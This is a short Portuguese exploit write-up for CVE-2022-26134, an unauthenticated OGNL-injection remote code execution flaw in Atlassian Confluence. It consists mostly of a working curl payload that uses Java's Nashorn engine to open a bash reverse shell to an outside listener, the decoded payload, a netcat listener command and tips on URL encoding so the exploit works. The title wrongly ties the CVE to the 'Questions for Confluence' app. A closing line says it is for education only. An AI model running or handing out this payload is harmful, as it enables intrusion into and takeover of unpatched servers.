
Exploração Ativa do Aplicativo Questions for Confluence da Atlassian CVE-2022-26134
CVE-2022-26134 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta o Atlassian Confluence. Esta vulnerabilidade permite que invasores não autenticados executem código arbitrário injetando expressões OGNL em endpoints vulneráveis.
O seguinte comando CURL demonstra a exploração ativa desta vulnerabilidade, utilizando o mecanismo Nashorn do Java para executar um shell reverso:
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
Ao fazer essas modificações, também precisamos levar em conta a codificação de URL. A string do payload na prova de conceito não está completamente codificada em URL. Certos caracteres (notadamente ".", "-" e "/") não são codificados. Embora nem sempre seja o caso, para este exploit, isso se mostra importante para o funcionamento do payload. Se qualquer um desses caracteres for codificado, o servidor interpretará a URL de forma diferente, e o payload pode não ser executado. Isso significa que não podemos aplicar a codificação de URL em todo o payload depois de modificá-lo.
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
Esta documentação é apenas para fins educacionais. A exploração não autorizada de sistemas é ilegal e pode resultar em consequências graves. Sempre obtenha autorização adequada antes de realizar avaliações de segurança.